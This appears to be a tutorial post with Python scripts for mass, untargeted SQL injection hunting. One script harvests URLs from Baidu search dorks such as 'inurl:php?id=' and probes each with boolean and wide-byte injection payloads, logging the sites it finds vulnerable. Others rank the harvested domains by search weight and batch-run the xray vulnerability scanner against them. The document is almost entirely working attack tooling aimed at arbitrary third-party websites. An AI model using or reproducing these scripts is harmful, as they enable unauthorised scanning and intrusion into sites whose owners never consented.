import re
import sys
import requests
import threading
from queue import Queue
from bs4 import BeautifulSoup as bs

class BaiduSiper(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self._queue = queue

    def run(self):
        while not self._queue.empty():
            url = self._queue.get()
            try:
                self.get_url(url)
            except Exception:
                pass
    def get_url(self, url):
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0'}
        r = requests.get(url, headers=headers)
        soup = bs(r.text, 'lxml')
        # Attribute filter dict after the a tag: real result links carry data-click and no class
        urls = soup.find_all("a", {"data-click": re.compile("."), "class": None})
        # print(urls)
        for i in urls:
            try:
                get_url = requests.get(i['href'], headers=headers, timeout=10)
                if get_url.status_code == 200:
                    with open('./url.txt', 'a', encoding='utf-8') as xie:
                        xie.write(str(get_url.url) + '\n')
                    print(get_url.url)
                    scan = get_url.url
                    payloads = {
                        'src': scan,
                        'bool_true': scan + ' aND 99=99',
                        'bool_false': scan + ' aND 99=11',
                        'new1': scan + '%27aND 99=99--+',
                        'new2': scan + '%27aND 99=11--+',
                        'dui1': scan + '%27;aND 99=99--+',
                        'dui2': scan + '%27;aND 99=11--+',
                        'kuan1': scan + '%df%27aND 99=99--+',
                        'kuan2': scan + '%df%27aND 99=11--+',
                    }
                    try:
                        # New rules can be added below
                        r_scr = requests.get(payloads['src'], timeout=5).headers['Content-Length']
                        r_true = requests.get(payloads['bool_true'], timeout=5).headers['Content-Length']
                        r_false = requests.get(payloads['bool_false'], timeout=5).headers['Content-Length']
                        r_new1 = requests.get(payloads['new1'], timeout=5).headers['Content-Length']
                        r_new2 = requests.get(payloads['new2'], timeout=5).headers['Content-Length']
                        r_dui1 = requests.get(payloads['dui1'], timeout=5).headers['Content-Length']
                        r_dui2 = requests.get(payloads['dui2'], timeout=5).headers['Content-Length']
                        r_kuan1 = requests.get(payloads['kuan1'], timeout=5).headers['Content-Length']
                        r_kuan2 = requests.get(payloads['kuan2'], timeout=5).headers['Content-Length']
                    except Exception:
                        continue  # skip this URL if any probe fails, otherwise the variables below would be unbound
                    if r_scr == r_true or r_new1 == r_true:
                        if r_true != r_false or r_new1 != r_new2:
                            with open('./sql.txt', 'a', encoding='utf-8') as xie:
                                xie.write(str(get_url.url) + '\n')
                            print('Injection found:', scan)
                    elif r_new1 == r_true:
                        if r_new1 != r_new2:
                            with open('./sql.txt', 'a', encoding='utf-8') as xie:
                                xie.write(str(get_url.url) + '\n')
                            print('Injection found:', scan)
                    elif r_dui1 != r_dui2:
                        with open('./sql.txt', 'a', encoding='utf-8') as xie:
                            xie.write(str(get_url.url) + '\n')
                        print('Injection found:', scan)
                    elif r_kuan1 != r_kuan2:
                        with open('./sql.txt', 'a', encoding='utf-8') as xie:
                            xie.write(str(get_url.url) + '\n')
                        print('Injection found:', scan)
                    # New comparisons can be added below at the same indentation as the "if r_scr" line
            except Exception:
                pass

def main(keyword, pn):
    queue = Queue()
    for i in range(0, pn * 10, 10):
        queue.put('https://www.baidu.com/s?wd=' + keyword + '&pn=' + str(i))
    threads = []
    thread_count = 4
    for i in range(thread_count):
        threads.append(BaiduSiper(queue))
    for t in threads:
        t.start()
    for t in threads:
        t.join()


def usage():
    if len(sys.argv) != 3:
        print("Usage: %s <Baidu dork keyword> <pages to crawl>" % sys.argv[0])
        print("Example: %s inurl:php?id= 10" % sys.argv[0])
        print('+' + '-' * 60 + '+')
        sys.exit()


if __name__ == '__main__':
    usage()
    main(sys.argv[1], int(sys.argv[2]))
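For reference, the script is run like this, assuming it is saved as baidu_sqli.py (the file name is not given in the post):

    python baidu_sqli.py "inurl:php?id=" 10

As the "New rules can be added below" comment suggests, a rule is a true/false payload pair whose Content-Length response headers are compared. A minimal sketch of one hypothetical addition (a double-quote %22 variant, not part of the original rule set): extend the payloads dict with

    'dq1': scan + '%22aND 99=99--+',   # hypothetical always-true probe
    'dq2': scan + '%22aND 99=11--+',   # hypothetical always-false probe

fetch r_dq1 and r_dq2 the same way as the other probes, then append an "elif r_dq1 != r_dq2:" branch at the same indentation as the "if r_scr" line.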
2.2: Process the links, query their Baidu weight, and save them by category
The code is as follows:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse
import sys

def chuli(sub):
    # Collect the unique domains from the URL list produced in step 2.1
    subdomain = []
    with open("./%s.txt" % sub, encoding='utf-8') as f:
        for line in f:
            domain = str(urlparse(line.strip()).netloc)
            if domain and domain not in subdomain:
                subdomain.append(domain)
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0'}
    n = 0
    m = 0
    for i in subdomain:
        url = 'https://www.aizhan.com/cha/' + i + '/'
        try:
            conn = requests.session()
            conn.get('https://www.aizhan.com', headers=headers)
            html = conn.get(url, stream=True, headers=headers, timeout=8)
            soup = BeautifulSoup(html.content, 'html.parser')
            # The alt of the img next to the baidurank_br link holds the weight value ('n' means no rank)
            get_quan = soup.find('a', attrs={'id': 'baidurank_br', 'target': '_blank'}).find_next('img')
            a = get_quan['alt']
            # Append the domain to a file named after its weight
            with open('./%s.txt' % a, 'a', encoding='utf-8') as xie:
                xie.write(str(i) + '\n')
            n += 1
            print('Processed %d domains' % n)
        except Exception:
            m += 1
            print('Domain %s: lookup failed' % i)
    print('Weight lookup and classification finished')
    print('%d lookups failed' % m)

if __name__ == '__main__':
    sub = sys.argv[1]
    chuli(sub)
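Invocation sketch, assuming the script is saved as chuli.py (file name assumed): pass the base name of a list file from step 2.1, since the script opens ./<name>.txt, e.g.

    python chuli.py sql

Each domain then lands in a file named after its Baidu weight (./1.txt, ./2.txt, ..., and ./n.txt for domains aizhan reports no rank for).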
2.3: Call xray to batch-scan the links in a file
The code is as follows:
import os
import hashlib
import re

def xrayScan(targeturl, outputfilename="test"):
    # Change xray.exe to match the name of your xray binary
    scanCommand = "xray.exe webscan --basic-crawler {} --html-output {}.html".format(targeturl, outputfilename)
    print(scanCommand)
    os.system(scanCommand)
    return

def pppGet():
    f = open("target.txt")  # change to match your target file name
    lines = f.readlines()
    pattern = re.compile(r'^https?://')  # also match https, so those URLs are not prefixed a second time
    for line in lines:
        try:
            if not pattern.match(line.strip()):
                targeturl = "http://" + line.strip()
            else:
                targeturl = line.strip()
            print(targeturl.strip())
            # The MD5 of the URL gives every report a unique, filesystem-safe name
            outputfilename = hashlib.md5(targeturl.encode("utf-8"))
            xrayScan(targeturl.strip(), outputfilename.hexdigest())
        except Exception as e:
            print(e)
    f.close()
    print("Scan finished")
    return

def main():
    pppGet()
    return


if __name__ == '__main__':
    main()
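Invocation sketch, assuming the script is saved as xrayScan.py (file name assumed) next to the xray binary and a target.txt (for example, a copy of one of the weight files from step 2.2):

    python xrayScan.py

xray's basic crawler then scans each URL in turn and writes its report to <md5-of-the-url>.html, so reports for different targets do not overwrite one another.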
2.4: Installing the Python libraries
The code is as follows:
# PipInstall.py
import os

libs = {"BeautifulSoup4", "requests", "lxml"}
# Add any libraries you need to libs; lxml is required by the spider in step 2.1
try:
    for lib in libs:
        print("start install {0}".format(lib))
        os.system("pip install " + lib)
        print("{} install successful".format(lib))
    print("All libraries installed")
except Exception:
    print("Some installations failed")